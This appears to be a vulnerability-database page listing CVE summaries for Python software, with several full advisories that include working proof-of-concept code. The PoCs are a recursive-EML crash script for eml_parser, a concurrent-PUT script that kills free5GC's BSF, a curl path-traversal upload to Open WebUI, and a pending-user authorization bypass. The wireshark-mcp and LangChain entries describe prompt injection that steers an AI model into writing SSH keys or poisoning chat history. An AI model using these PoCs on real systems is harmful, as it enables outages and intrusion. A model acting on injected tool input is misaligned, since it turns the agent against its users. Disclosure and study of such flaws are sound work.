Privilege escalation in JupyterLab 4.0.0 through 4.5.6 allows authenticated users to bypass extension allow-list controls and install arbitrary PyPI packages, enabling potential data exfiltration and lateral movement in multi-tenant deployments. The PyPI Extension Manager failed to enforce the `allowed_extensions_uris` configuration, permitting installation of packages outside the approved list. This vulnerability is particularly critical in shared educational environments (JupyterHub) and multi-tenant deployments where kernel/terminal access is restricted. Vendor-released patch available in JupyterLab v4.5.7. No public exploit identified at time of analysis, though exploitation requires only authenticated access with low complexity (CVSS AC:L).

Python Privilege Escalation
NVD GitHub VulDB
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-43901 PyPI MEDIUM GHSA This Month

Arbitrary file write in wireshark-mcp up to version 1.1.5 allows remote attackers to write files to any filesystem location via prompt injection in pcap payloads that trigger the wireshark_export_objects MCP tool. The vulnerability exploits missing mandatory path restrictions when the WIRESHARK_MCP_ALLOWED_DIRS environment variable is not configured (default state). An attacker can craft a malicious pcap with embedded HTTP objects bearing filenames like authorized_keys, manipulate an AI model using the MCP server into calling export_objects with dest_dir=/home/user/.ssh/, and achieve SSH access, cron hijacking, or web shell placement. Publicly available proof of concept confirms exploitation against version 1.1.5 with tshark 4.6.4; no vendor-released patch exists at time of analysis.

Python Path Traversal
NVD GitHub
CVSS 3.1
6.8
EPSS
0.0%
CVE-2026-42196 PyPI CRITICAL PATCH GHSA Act Now

Path traversal in django-s3file's S3FileMiddleware allows attackers to manipulate HTTP requests and force Django applications to load arbitrary files from unintended S3 locations into request.FILES, bypassing pre-signed upload location restrictions. Affects all versions <=7.0.1. Vendor-confirmed vulnerability with patch released in version 7.0.2. No active exploitation confirmed (not in CISA KEV). CVSS metrics not available, but path traversal combined with file handling operations presents moderate confidentiality and integrity risk depending on application-specific file processing logic.

Python Path Traversal
NVD GitHub
CVSS 4.0
9.9
EPSS
0.1%
CVE-2026-42194 PHP MEDIUM PATCH GHSA This Month

DNS rebinding in Admidio's SSO metadata fetch endpoint bypasses SSRF protections by validating a hostname's IP address with gethostbyname() but passing the original hostname to curl_init(), allowing attackers to redirect requests to internal services including cloud metadata endpoints. Authenticated administrators can exploit this TOCTOU window between DNS resolution check and cURL connection to access internal IP ranges, read instance metadata, or scan internal networks.

Python SSRF PHP
NVD GitHub
CVSS 3.1
6.8
EPSS
0.0%
CVE-2026-42175 PyPI MEDIUM PATCH GHSA This Month

Server-side request forgery in requests-hardened prior to 1.2.1 allows remote attackers to bypass SSRF protection and access internal services within RFC 6598 Shared Address Space (100.64.0.0/10) by supplying arbitrary URLs, particularly impacting AWS EKS deployments where this CIDR is the default pod network. The vulnerability has a CVSS score of 6.5 and is environment-dependent, affecting only deployments using the vulnerable IP range for internal networking. Vendor-released patch: version 1.2.1 extends IP filtering logic to block RFC 6598, 6to4 relay anycast, IPv6 reserved ranges, and multicast addresses.

Python SSRF
NVD GitHub
CVSS 3.1
6.5
EPSS
0.0%
EPSS 0% CVSS 5.0
MEDIUM This Month

GuardDog versions 2.6.0 through 2.9.0 fail to escape terminal control characters in human-readable scan output, allowing malicious packages to inject ANSI or OSC escape sequences that can clear analyst terminals, rewrite CI logs, or inject spoofed content. The vulnerability affects file paths, code snippets, and messages parsed from package content and rendered directly to stdout without sanitization. Remote attackers can exploit this by distributing packages with specially crafted filenames or source code containing escape sequences, and requires only user interaction (running the scanner on the malicious package).

Python Code Injection
NVD GitHub
EPSS 0% CVSS 6.9
MEDIUM PATCH This Month

pgAdmin 4 before version 9.15 allows unauthenticated attackers to bypass account lockout and perform unbounded password-guessing attacks against INTERNAL authentication accounts by exploiting Flask-Security's default /login endpoint, which does not enforce the locked column that the custom /authenticate/login view relies on for brute-force protection. The vulnerability affects only accounts using pgAdmin's INTERNAL authentication source; LDAP, OAuth2, Kerberos, and Webserver authentication methods are not vulnerable because they do not use local passwords.

Authentication Bypass Python
NVD GitHub
EPSS 0% CVSS 7.3
HIGH PATCH This Week

Unsafe Python pickle deserialization in pgAdmin 4 FileBackedSessionManager allows authenticated local users with session-directory write access to execute arbitrary code as the pgAdmin process. The vulnerability arises from deserializing session files before validating their HMAC signature, enabling payload injection through crafted pickle objects. Attackers require both valid authentication and filesystem write permission to the sessions directory-achievable through misconfiguration or chaining with a separate path-traversal vulnerability. EPSS exploitation probability and KEV status not provided; no public exploit code identified at time of analysis. PostgreSQL maintainers confirmed the flaw and patched it in version 9.15 by implementing pre-deserialization HMAC validation.

Python RCE Deserialization
NVD GitHub VulDB
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Command injection in BentoML 1.4.38 and earlier allows attackers to execute arbitrary code on build hosts when victims containerize malicious bentos. Exploitation occurs during the `bentoml containerize` workflow when unvalidated `envs[*].name` and `docker.base_image` fields from imported bentofile.yaml are interpolated into generated Dockerfiles without escaping, enabling newline-injection of RUN directives executed by `docker build`. This is a sibling vulnerability to CVE-2026-33744 and CVE-2026-35043 which patched the same injection class in `system_packages` fields but left these additional attack surfaces unaddressed. Patch version 1.4.39 available from vendor. No CISA KEV listing or public POC outside gated HuggingFace repository at time of analysis, but end-to-end reproduction confirmed by reporter on BentoML 1.4.38.

Python Docker Command Injection
NVD GitHub
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Command injection in BentoML allows arbitrary code execution on developer workstations during containerization of untrusted bento packages. Attackers craft malicious bento.yaml files with newline-injected docker.base_image values that smuggle Dockerfile RUN directives into the generated Dockerfile template. When victims run 'bentoml containerize' on the malicious bento, Docker build executes the injected commands on the host system with full developer privileges. This vulnerability (GHSA-78f9-r8mh-4xm2) is part of a documented cluster alongside GHSA-w2pm-x38x-jp44, CVE-2026-33744, and CVE-2026-35043, all involving unsafe Jinja2 template interpolation in BentoML's Dockerfile generation pipeline. Fixed in version 1.4.39. No active exploitation confirmed at time of analysis; EPSS data not available for 2026-dated CVE.

Python Docker Command Injection
NVD GitHub
EPSS 0% CVSS 8.7
HIGH This Week

Cross-Site WebSocket Hijacking (CSWSH) in Dozzle's /exec and /attach endpoints allows authenticated shell access bypass when --enable-shell is enabled. The vulnerability stems from WebSocket origin validation bypass (CheckOrigin returns true) combined with SameSite=Lax JWT cookies, enabling attackers on same-site origins (sibling subdomains or localhost services) to hijack victim WebSocket sessions and execute arbitrary commands in Docker containers. Affects all Dozzle deployments through version 10.5.1 with shell access enabled. No public exploit identified at time of analysis, but detailed proof-of-concept exists in the GitHub advisory demonstrating container shell access via Python script. CVSS score not assigned, but CWE-346 classification indicates origin validation failure.

Python Docker RCE
NVD GitHub VulDB
EPSS 0% CVSS 8.1
HIGH PATCH This Week

Path traversal in Open WebUI's file upload mechanism allows authenticated attackers to write and subsequently delete arbitrary files on the server filesystem. Discovered by Taylor Pennington of KoreLogic, this vulnerability affects the /ollama/models/upload API endpoint where unsanitized filename parameters enable directory traversal using dot-segments. The vulnerability requires low-privilege authentication (PR:L) and has straightforward exploitation (AC:L), confirmed by a published GitHub security advisory (GHSA-j3fw-wc48-29g3) with working proof-of-concept code. Vendor-released patch available in version 0.6.10. No evidence of active exploitation (not in CISA KEV) at time of analysis.

Python Path Traversal Debian
NVD GitHub
EPSS 0% CVSS 8.6
HIGH PATCH This Week

Server-side request forgery in Gotenberg's Chromium URL-to-PDF endpoint allows unauthenticated remote attackers to exfiltrate cloud credentials and access internal services. The primary `/forms/chromium/convert/url` endpoint ships with no default deny-list for HTTP/HTTPS targets - only blocking file:// URIs - enabling direct access to AWS/GCP/Azure metadata endpoints at 169.254.169.254, RFC 1918 private networks, and localhost services. Even when administrators configure custom deny-lists, attackers bypass validation via HTTP 302 redirects, as Chromium follows redirects without re-validating destinations. Vendor-confirmed public exploit code exists (PoC in GHSA-chwh-f6gm-r836). Patch available in version 8.32.0.

SSRF Microsoft Python +2
NVD GitHub
EPSS 0% CVSS 5.7
MEDIUM This Month

CosyVoice thru commit 6e01309e01bc93bbeb83bdd996b1182a81aaf11e (2025-30-21) contains an insecure deserialization vulnerability (CWE-502) in its model loading component. The framework uses torch.load() to load model weight files (e.g., llm.pt, flow.pt, hift.pt) without enabling the security-restrictive weights_only=True parameter. This allows the deserialization of arbitrary Python objects via the pickle module. An attacker can exploit this by providing a malicious model directory containing specially crafted model files. When a victim starts the CosyVoice Web UI pointing to this directory, arbitrary code is executed on the victim's system during the model loading process.

Python Code Injection Deserialization +2
NVD GitHub
EPSS 0% CVSS 7.3
HIGH This Week

The flash-attention project thru commit e724e2588cbe754beb97cf7c011b5e7e34119e62 (2025-13-04) contains a code injection vulnerability (CWE-94) in its training script. The script registers the Python eval() function as a Hydra configuration resolver under the name eval. This allows configuration files to execute arbitrary Python code via the ${eval:...} syntax. An attacker can exploit this by providing a malicious configuration file, leading to arbitrary code execution when the training script is run with that configuration.

Python Code Injection RCE +1
NVD
EPSS 0% CVSS 7.3
HIGH This Week

CosyVoice thru commit 6e01309e01bc93bbeb83bdd996b1182a81aaf11e (2025-30-21) contains an insecure deserialization vulnerability (CWE-502) in its gRPC server component. When the server starts, it loads the speech synthesis model from a user-specified directory using torch.load() without enabling the weights_only=True security parameter. This allows the deserialization of arbitrary Python objects via the pickle module. An attacker can exploit this by providing malicious model files within a directory. When a victim starts the gRPC server pointing to this directory, arbitrary code is executed on the victim's system during server initialization.

Python RCE Deserialization +1
NVD GitHub
EPSS 0% CVSS 7.3
HIGH This Week

CosyVoice thru commit 6e01309e01bc93bbeb83bdd996b1182a81aaf11e (2025-30-21) contains an insecure deserialization vulnerability (CWE-502) in its average_model.py model averaging tool. The script loads PyTorch checkpoint files (epoch_*.pt) for model averaging using torch.load() without enabling the weights_only=True security parameter. This allows the deserialization of arbitrary Python objects via the pickle module. An attacker can exploit this by providing malicious checkpoint files within a directory. When a victim uses the tool to average models from this directory, arbitrary code is executed on the victim's system.

Checkpoint Python RCE +2
NVD GitHub
EPSS 0% CVSS 7.3
HIGH This Week

The flash-attention training framework thru commit e724e2588cbe754beb97cf7c011b5e7e34119e62 (2025-13-04) contains an insecure deserialization vulnerability (CWE-502) in its checkpoint loading mechanism. The load_checkpoint() function in checkpoint.py and the checkpoint loading code in eval.py use torch.load() without enabling the security-restrictive weights_only=True parameter. This allows the deserialization of arbitrary Python objects via the pickle module. An attacker can exploit this by providing a maliciously crafted checkpoint file. When a victim loads this checkpoint during model warmstarting or evaluation, arbitrary code is executed on the victim's system.

Checkpoint Deserialization Python +3
NVD GitHub
EPSS 0% CVSS 7.3
HIGH This Week

CosyVoice thru commit 6e01309e01bc93bbeb83bdd996b1182a81aaf11e (2025-30-21) contains an insecure deserialization vulnerability (CWE-502) in its make_parquet_list.py data processing tool. The script loads PyTorch .pt files (utterance embeddings, speaker embeddings, speech tokens) using torch.load() without enabling the weights_only=True security parameter. This allows the deserialization of arbitrary Python objects via the pickle module. An attacker can exploit this by providing malicious .pt files within a data directory. When a victim processes this directory using the tool, arbitrary code is executed on the victim's system.

Python RCE Deserialization +1
NVD GitHub
EPSS 0% CVSS 6.1
MEDIUM PATCH This Month

Cross-site scripting (XSS) in mistune's HTMLRenderer.heading() allows injection of arbitrary HTML attributes when custom heading_id callbacks return unsanitized heading text. The vulnerability occurs because the id attribute value is concatenated directly into the HTML tag without escaping, enabling attackers who control heading content to break out of the id= attribute and inject event handlers or other malicious attributes. Exploitation requires a caller-supplied heading_id callback that derives IDs from heading text - the most common real-world pattern used by documentation generators like MkDocs, Sphinx, and Jekyll. Publicly available proof-of-concept demonstrates mouse-over triggered JavaScript execution via onmouseover attribute injection.

XSS Apple Python +1
NVD GitHub VulDB
EPSS 0% CVSS 6.1
MEDIUM PATCH This Month

Cross-site scripting (XSS) vulnerability in the Mistune markdown parser's math plugin bypasses the `escape=True` security setting by rendering inline (`$...$`) and block (`$$...$$`) math content without HTML escaping. Attackers can inject arbitrary JavaScript that executes in the victim's browser session when a developer-controlled application parses untrusted markdown with the math plugin enabled, even when the parser is explicitly configured to sanitize all user input. Proof-of-concept code demonstrates script tag injection and image onerror handler exploitation; no public exploit code identified at time of analysis.

XSS Apple Python +1
NVD GitHub
EPSS 0% CVSS 6.3
MEDIUM PATCH This Month

### Summary `EmlParser.get_raw_body_text()` recurses unconditionally for every nested `message/rfc822` attachment without any depth limit. An attacker who can supply a badly crafted EML file with approximately 120 nested `message/rfc822` parts triggers an unhandled `RecursionError` and aborts parsing of the message. A 12 KB EML file is enough to crash a worker. Though this causes the parser to crash, it is an unlikely scenario as the suggested EML that crashes the parser would not pass basic RFC compliance tests. ### Details The vulnerable function is `EmlParser.get_raw_body_text()` in `eml_parser/parser.py`. For every part of type `multipart/*`, the function iterates over its sub-parts; for every sub-part of type `message/rfc822`, it calls itself recursively on the inner message: There is no depth parameter and no early-abort. CPython's default `sys.recursionlimit` is 1000. Each level of `message/rfc822` nesting adds approximately 8 frames to the stack (parser code + stdlib `_header_value_parser` calls), so roughly 120 nested levels exhaust the limit. The `RecursionError` is not caught anywhere along the call chain, so it propagates out of `decode_email_bytes()` and aborts processing of the entire message. ### PoC Environment: Python 3.12.3, eml_parser 3.0.0 (`pip install eml_parser==3.0.0`), default `sys.recursionlimit=1000`, Ubuntu 24.04 aarch64. No special configuration of `EmlParser`, default constructor. Self-contained reproducer that builds the PoC and triggers the crash: ```python import eml_parser def build_poc(depth=124): inner = b"From: a@a\r\nTo: b@b\r\nContent-Type: text/plain\r\n\r\n.\r\n" msg = inner for i in range(depth): b = f"B{i}".encode() msg = ( b'Content-Type: multipart/mixed; boundary="' + b + b'"\r\n\r\n' b'--' + b + b'\r\nContent-Type: message/rfc822\r\n\r\n' ) + msg + b'\r\n--' + b + b'--\r\n' return msg ep = eml_parser.EmlParser() ep.decode_email_bytes(build_poc()) # RecursionError after ~76 ms on Apple Silicon (Ubuntu 24.04 aarch64). ``` Note that the suggested code does not produce an RFC compliant message. Resulting EML payload size: 12,369 bytes. SHA-256 of generated PoC: `00f15f635e21b4144967c2893b37425e6a6bd7b4185c557e5c7e904e1e6d18e8` The crash is deterministic on a stock install. No network, no special headers, no large attachments. ### Impact Denial of service of any pipeline that processes attacker-supplied EML files using `eml_parser`. A single 12 KB email is enough to crash a worker. If the worker is a long-running process triaging multiple emails, the unhandled exception aborts processing of the whole batch unless the caller wraps the call in a broad `try/except`. Even then, attacker-supplied volume can keep workers in a perpetual restart loop. The vulnerability is exploitable pre-authentication in any deployment that ingests emails from external senders which have not been subject to any kind of basic validation. Considering that email messages pass through a mail-server which does some kind of validation, messages as produced by the *build_poc* function would not reach eml_parser. Nonetheless recursion depth checks have been implemented to handle the described issue. ### Reporter Sebastián Alba Vives (`@Sebasteuo`) Independent security researcher, Senior AppSec Consultant LinkedIn: https://www.linkedin.com/in/sebastian-alba Email: sebasjosue84@gmail.com PGP: `0D1A E4C2 CFC8 894F 19EA DA24 45CD CA33 2CF8 31F4`

Python Denial Of Service Apple +1
NVD GitHub
EPSS 0% CVSS 8.2
HIGH PATCH This Week

LangChain contains older runtime code paths that deserialize run inputs, run outputs, or other application-controlled payloads using overly broad object allowlists. These paths may call `load()` with `allowed_objects="all"`. This does not enable arbitrary Python object deserialization, but it does allow any trusted LangChain-serializable object to be revived, which is broader than these runtime paths require. As a result, attacker-supplied LangChain serialized constructor dictionaries may cause trusted runtime paths to instantiate classes with untrusted constructor arguments. Applications are exposed only when all of the following are true: 1. The application accepts untrusted structured input, such as JSON, from a user or network request. 2. The application does not validate or canonicalize that input into an inert schema before invoking LangChain. 3. Attacker-controlled nested dictionaries or lists are preserved in LangChain run inputs or outputs. 4. The application uses an affected API path that later deserializes that run data. Known affected runtime surfaces include: - `RunnableWithMessageHistory` - `astream_log()` - `astream_events(version="v1")` Related unsafe deserialization patterns may also affect applications that explicitly load serialized LangChain prompt or runnable objects from untrusted sources, including shared prompt stores, Hub artifacts with model configuration, or other application-controlled serialization stores. Applications that validate incoming requests against a fixed schema, such as coercing user input to a plain string or message-content field before invoking LangChain, are unlikely to expose this deserialization primitive. This release also fixes a related secret-marker validation bypass in the serialization and deserialization layer (`_is_lc_secret`). That issue creates an additional path by which attacker-controlled constructor dictionaries can avoid escaping during `dumps()` -> `loads()` round-trips and reach LangChain object revival logic. ## Impact An attacker who can submit untrusted structured input to an affected application, and have that structure preserved in LangChain run data, may be able to inject LangChain serialized constructor payloads such as: ```json { "lc": 1, "type": "constructor", "id": ["langchain_core", "messages", "ai", "AIMessage"], "kwargs": {"content": "attacker-controlled content"} } ``` If this payload reaches a broad `load()` call, LangChain may instantiate the referenced class instead of treating the payload as inert user data. Realistic impacts include: - Persistent chat-history poisoning when revived `AIMessage`, `HumanMessage`, or `SystemMessage` objects are stored by `RunnableWithMessageHistory`. - Prompt injection or behavior manipulation if attacker-controlled messages are later included in model context. - Instantiation of unexpected trusted LangChain objects with attacker-controlled constructor arguments. - Possible credential disclosure or server-side requests if a reachable object reads environment credentials, creates clients, or contacts attacker-controlled endpoints during initialization. - Additional prompt-template or runnable-configuration impacts in applications that separately load and execute untrusted serialized LangChain objects. ## Remediation LangChain will deprecate the affected APIs as part of this fix: - `RunnableWithMessageHistory` - `astream_log()` - `astream_events(version="v1")` These are older code paths that are no longer recommended for new applications. They were not previously marked as deprecated, but recent LangChain documentation has primarily directed users toward newer streaming and memory patterns, including the `stream` API. Applications should migrate to the currently recommended APIs rather than continue depending on these older surfaces. Separately, LangChain will update `load()` and `loads()` to tighten deserialization behavior so broad object revival is not applied implicitly to untrusted or application-controlled payloads. The older runtime surfaces listed above are being deprecated rather than preserved as supported paths for broad runtime deserialization. This release also fixes a related secret-marker validation bypass in the serialization and deserialization layer (`_is_lc_secret`). That issue creates an additional path by which attacker-controlled constructor dictionaries can avoid escaping during `dumps()` -> `loads()` round-trips and reach LangChain object revival logic. ## Guidance for `load()` and `loads()` `load()` and `loads()` should be used only with trusted LangChain manifests or serialized objects from trusted storage. Do not pass user-controlled data to `load()` or `loads()`, and do not use them as general parsers for request bodies, tool inputs, chat messages, or other attacker-controlled data. `load()` and `loads()` are beta APIs, and their behavior may change as LangChain narrows unsafe defaults. Future LangChain versions will require callers to be explicit about which objects may be revived. Users should pass a narrow `allowed_objects` value appropriate for the specific trusted manifest they are loading, rather than relying on broad defaults or `allowed_objects="all"`, which permits the full trusted LangChain serialization allowlist. ## Credits The original issue was first reported by @u-ktdi. Similar findings were reported by @dewankpant, @shrutilohani, @Moaaz-0x, @pucagit. A related `_is_lc_secret` marker bypass affecting `dumps()` -> `loads()` round-trips was reported by @yardenporat353 (and a similar report by @localhost-detect)

Python Deserialization
NVD GitHub
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

### Summary free5GC's BSF `PUT /nbsf-management/v1/subscriptions/{subId}` handler has an unsynchronized write on the global `Subscriptions` map. The handler first reads the map under `RLock()` via `BSFContext.GetSubscription(subId)`, but if the subscription does not exist, `ReplaceIndividualSubcription()` writes back to the same map directly without taking the mutex (`bsfContext.BsfSelf.Subscriptions[subId] = subscription`). Under concurrent authenticated PUT load, one goroutine can read while another writes the map, which causes the Go runtime to abort the process with `fatal error: concurrent map read and map write` (Go runtime panics that come from concurrent map access bypass `recover()` and terminate the process). The BSF container exits with code `2` -- the entire BSF SBI surface goes down until restart. This endpoint requires a valid `nbsf-management` OAuth2 access token (PR:L, NOT PR:N), so this is scored as an authenticated process-kill DoS. ### Details Validated against the BSF container in the official Docker compose lab. - Source repo tag: `v4.2.1` - Running Docker image: `free5gc/bsf:v4.2.1` - Docker validation date: 2026-03-22 - BSF endpoint: `http://10.100.200.11:8000` Read side (locked): ```go func (c *BSFContext) GetSubscription(subId string) (*BsfSubscription, bool) { c.mutex.RLock() defer c.mutex.RUnlock() sub, exists := c.Subscriptions[subId] return sub, exists } ``` Unsafe write side in the create-if-absent branch of `ReplaceIndividualSubcription` (no `Lock()`): ```go subscription.SubId = subId bsfContext.BsfSelf.Subscriptions[subId] = subscription ``` Under concurrent traffic, the Go runtime detects the unsynchronized read/write on `c.Subscriptions` and aborts the process. Go's `concurrent map read and map write` fatal is NOT a normal panic -- it is unrecoverable, Gin's recovery middleware does not catch it, and the BSF process terminates. Code evidence (paths in `free5gc/bsf`): - Read side (locked): - `NFs/bsf/internal/sbi/processor/subscriptions.go:81` - `NFs/bsf/internal/context/context.go:726` - `NFs/bsf/internal/context/context.go:730` - Unsafe write side (the create-if-absent branch in PUT, no lock): - `NFs/bsf/internal/sbi/processor/subscriptions.go:111` - `NFs/bsf/internal/sbi/processor/subscriptions.go:114` The normal locked helpers (`CreateSubscription()`, `GetSubscription()`, `UpdateSubscription()`, `DeleteSubscription()`) DO take the mutex correctly. The bug is specific to the inline write inside the PUT create-if-absent branch. ### PoC Reproduced end-to-end against the running BSF at `http://10.100.200.11:8000`. 1. Obtain a valid `nbsf-management` token from NRF: ``` curl -sS -X POST 'http://10.100.200.3:8000/oauth2/token' \ -H 'Content-Type: application/x-www-form-urlencoded' \ --data 'grant_type=client_credentials&nfType=NEF&nfInstanceId=eb9990de-4cd3-41b0-b5d9-c2102b088c57&targetNfType=BSF&scope=nbsf-management' ``` 2. Send concurrent PUT requests against fresh `subId` values (the validated lab uses 64 worker threads x 50 fresh subIds = 3200 concurrent PUTs): ```python import json, threading, urllib.request TOKEN = "<valid_nbsf_management_jwt>" BASE = "http://10.100.200.11:8000/nbsf-management/v1" PAYLOAD = json.dumps({ "events": ["PCF_BINDING_CREATION"], "notifUri": "http://127.0.0.1/cb", "notifCorreId": "1", "supi": "imsi-208930000000003", }).encode() def send_put(i, n): url = f"{BASE}/subscriptions/race-mix-{i}-{n}" req = urllib.request.Request(url, data=PAYLOAD, method="PUT") req.add_header("Authorization", f"Bearer {TOKEN}") req.add_header("Content-Type", "application/json") urllib.request.urlopen(req, timeout=2).read() threads = [] for i in range(64): for n in range(50): threads.append(threading.Thread(target=send_put, args=(i, n))) for t in threads: t.start() for t in threads: t.join() ``` 3. BSF container logs (`docker logs bsf`) show the Go runtime fatal that terminated the process: ``` [INFO][BSF][Proc] Handle ReplaceIndividualSubcription fatal error: concurrent map read and map write github.com/free5gc/bsf/internal/sbi/processor.ReplaceIndividualSubcription(0xc000514300) github.com/free5gc/bsf/internal/sbi/processor/subscriptions.go:81 +0x15f ``` 4. Container state confirms exit code 2: ``` exited|2|0 ``` ### Impact Unsynchronized concurrent access (CWE-362) to a shared map (`BsfSelf.Subscriptions`), combined with missing synchronization on the create-if-absent branch (CWE-820). Go's runtime detects concurrent map read/write and terminates the process via a non-recoverable fatal error -- Gin's `recover()` middleware does NOT catch this class of fatal, unlike ordinary nil-deref panics. The whole BSF process exits, dropping BSF's `nbsf-management` SBI surface (PCF binding lookups for SMF, AF -> PCF binding discovery, etc.) until restart. Any party that holds (or can obtain) a valid `nbsf-management` token can: - Drive the create-if-absent code path at high concurrency by PUTting a stream of fresh `subId` values, deterministically tripping the runtime fatal and killing the BSF process. - Repeat the trigger after every restart to sustain the outage. No Confidentiality impact (the crash returns no attacker-readable data). No persistent Integrity impact (BSF subscription state is in-memory and is lost when the process dies). The whole impact concentrates in Availability: complete loss of BSF service via concurrent attacker traffic on a single endpoint. Affected: free5gc v4.2.1. Upstream issue: https://github.com/free5gc/free5gc/issues/926 Upstream fix: https://github.com/free5gc/bsf/pull/7

Denial Of Service Python Docker +1
NVD GitHub
EPSS 0% CVSS 7.3
HIGH PATCH This Week

# **CONFIDENTIAL** # KL-CAN-2024-002 ## Vulnerability Details | # | Field | Value | |---|-------|-------| | 1 | **Discoverer** | Jaggar Henry & Sean Segreti of KoreLogic, Inc. | | 2 | **Date Submitted** | 2024.03.12 | | 3 | **Title** | Open WebUI Arbitrary File Upload + Path Traversal | | 5 | **Affected Vendor** | Open WebUI | | 6 | **Affected Product(s)** | Open WebUI (Formerly Ollama WebUI) | | 7 | **Affected Version(s)** | 0.1.105 | | 8 | **Platform/OS** | Debian GNU/Linux 12 (bookworm) | | 9 | **Vector** | HTTP web interface | | 10 | **CWE** | CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), CWE-434: Unrestricted Upload of File with Dangerous Type | --- ## 4. High-level Summary Attacker controlled files can be uploaded to arbitrary locations on the web server's filesystem by abusing a path traversal vulnerability. --- ## 11. Technical Analysis When attaching files to a prompt by clicking the plus sign (+) on the left of the message input box when using the Open WebUI HTTP interface, the file is uploaded to a static upload directory. The name of the file is derived from the original HTTP upload request and is not validated or sanitized. This allows for users to upload files with names containing dot-segments in the file path and traverse out of the intended uploads directory. Effectively, users can upload files anywhere on the filesystem the user running the web server has permission. This can be visualized by examining the python code for the `/rag/api/v1/doc` API route: ```python @app.post("/doc") def store_doc( collection_name: Optional[str] = Form(None), file: UploadFile = File(...), user=Depends(get_current_user), ): # "https://www.gutenberg.org/files/1727/1727-h/1727-h.htm" print(file.content_type) try: filename = file.filename file_path = f"{UPLOAD_DIR}/{filename}" contents = file.file.read() with open(file_path, "wb") as f: f.write(contents) f.close() ``` The `file` variable is a representation of the multipart form data contained within the HTTP POST request. The `filename` variable is derived from the uploaded file name and is not validated before writing the file contents to disk. This can be used to upload malicious models. These models are often distributed as pickled python objects and can be leveraged to execute arbitrary python bytecode once deserialized. Alternatively, an attacker can leverage existing services, such as SSH, to upload an attacker controlled `authorized_keys` file to remotely connect to the machine. --- ## 12. Proof-of-Concept Execute the following cURL command: ```bash TARGET_URI='https://redacted.com'; JWT='redacted'; LOCAL_FILE='/tmp/file_to_upload.txt'\ curl -H "Authorization: Bearer $JWT" -F "file=$LOCAL_FILE;filename=../../../../../../../../../../tmp/pwned.txt" "$TARGET_URI/rag/api/v1/doc" ``` Verify the file `pwned.txt` exists in the `/tmp/` directory on the machine hosting the web server: ```console ollama@webserver:~$ cat /tmp/pwned.txt korelogic ollama@webserver:~$ ```

Python File Upload Path Traversal +1
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH PATCH This Week

# **CONFIDENTIAL** # Vulnerability Disclosure Analysis Documentation --- ## Vulnerability Details | # | Field | Value | |---|-------|-------| | 1 | **Discoverer** | Taylor Pennington of KoreLogic, Inc. | | 2 | **Date Submitted** | June 11, 2024 | | 3 | **Title** | Open WebUI Improper Authorization Control | | 5 | **Affected Vendor** | Open WebUI | | 6 | **Affected Product(s)** | Open WebUI (Formerly Ollama WebUI) | | 7 | **Affected Version(s)** | 0.1.105 | | 8 | **Platform/OS** | Debian GNU/Linux 12 (bookworm) | | 9 | **Vector** | HTTP web interface | | 10 | **CWE** | 285 Improper Authorization | --- ## 4. High-level Summary There is a missing authorization check affecting user accounts with a `pending` status allowing the user to make authenticated API calls as a `user` context. --- ## 11. Technical Analysis The Open WebUI web application has three user role classifications: `user`, `admin`, and `pending`. By default, when Open WebUI is configured with `new sign-ups` enabled, the default user role is set to `pending`. In this configuration, an administrator is required to go into the Admin management panel following a new user registration and reconfigure the user to have a role of either `user` or `admin` before that user is able to access the web application. However, this check is only enforced at the client presentation layer, the API does not properly validate that the user has an authorized user role of `user`. ### Request ```http POST /api/v1/auths/signup HTTP/1.1 Host: openwebui.example.com Content-Length: 60 { "name": "", "email": "bad_guy@korelogic.com", "password": "a" } ``` ### Response ```http HTTP/1.1 200 OK ... { "id": "f839557a-031a-47a5-9999-0b0998f8f959", "email": "bad_guy@korelogic.com", "name": "", "role": "pending", "profile_image_url": "/user.png", "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImY4Mzk1NTdhLTAzMWEtNDdhNS05OTk5LTBiMDk5OGY4Zjk1OSJ9.Bk-S4ABXb1tRuiVNfOJYbQFB8ewixWA4a1FohvIZARs", "token_type": "Bearer" } ``` An attacker can then use the JWT in the above response to make direct API calls or they can forge the authentication response and use the web UI. With the JWT, an attacker can now query the LLM. However, for this demonstration we will query the `/ollama/api/tags` endpoint and get a list of available models as this is an authenticated endpoint. Attempting to make this request without a valid JWT returns an HTTP `401 Unauthorized` response. ### Request ```http GET /ollama/api/tags HTTP/1.1 Host: openwebui.example.com Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImY4Mzk1NTdhLTAzMWEtNDdhNS05OTk5LTBiMDk5OGY4Zjk1OSJ9.Bk-S4ABXb1tRuiVNfOJYbQFB8ewixWA4a1FohvIZARs ``` ### Response ```http HTTP/1.1 200 OK ... { "models": [ { "name": "ollama.com/emsi/mixtral-8x22b:latest", "model": "ollama.com/emsi/mixtral-8x22b:latest", "modified_at": "2024-04-12T17:27:51.479356401-04:00", "size": 79509285991, "digest": "9b000033acd802656a652c7df4e25300a61d903cd3c8eb065a50aaace484c319", "details": { "parent_model": "", "format": "gguf", "family": "llama", "families": ["llama"], "parameter_size": "141B", "quantization_level": "Q4_0" }, "urls": [0] }, ... ] } ``` The logic for this endpoint can be seen here: <https://github.com/open-webui/open-webui/blob/0399a69b73de9789c4221acedea70d528e1346c4/backend/apps/ollama/main.py#L163-L180> As shown below, the login checks if `url_idx` is `None` and if so, call `get_all_mdoels` and assign the result to `models` after that the logic checks if `app.state.MODEL_FILTER_ENABLED` is true and if not, it returns the result. As `MODEL_FILTER_ENABLED` is not configured by default, the application will not attempt to further validate the user. ```python @app.get("/api/tags") @app.get("/api/tags/{url_idx}") async def get_ollama_tags( url_idx: Optional[int] = None, user=Depends(get_current_user) ): if url_idx == None: models = await get_all_models() if app.state.MODEL_FILTER_ENABLED: if user.role == "user": models["models"] = list( filter( lambda model: model["name"] in app.state.MODEL_FILTER_LIST, models["models"], ) ) return models return models ``` This is just an example of one API endpoint but all other regular user accessible endpoints were accessible to a pending user. The vulnerability is caused by a missing authorization check that occurs with `user=Depends(get_current_user)`. The logic of that function is found here: <https://github.com/open-webui/open-webui/blob/0399a69b73de9789c4221acedea70d528e1346c4/backend/utils/utils.py#L77-L97> ```python def get_current_user( auth_token: HTTPAuthorizationCredentials = Depends(bearer_security), ): # auth by api key if 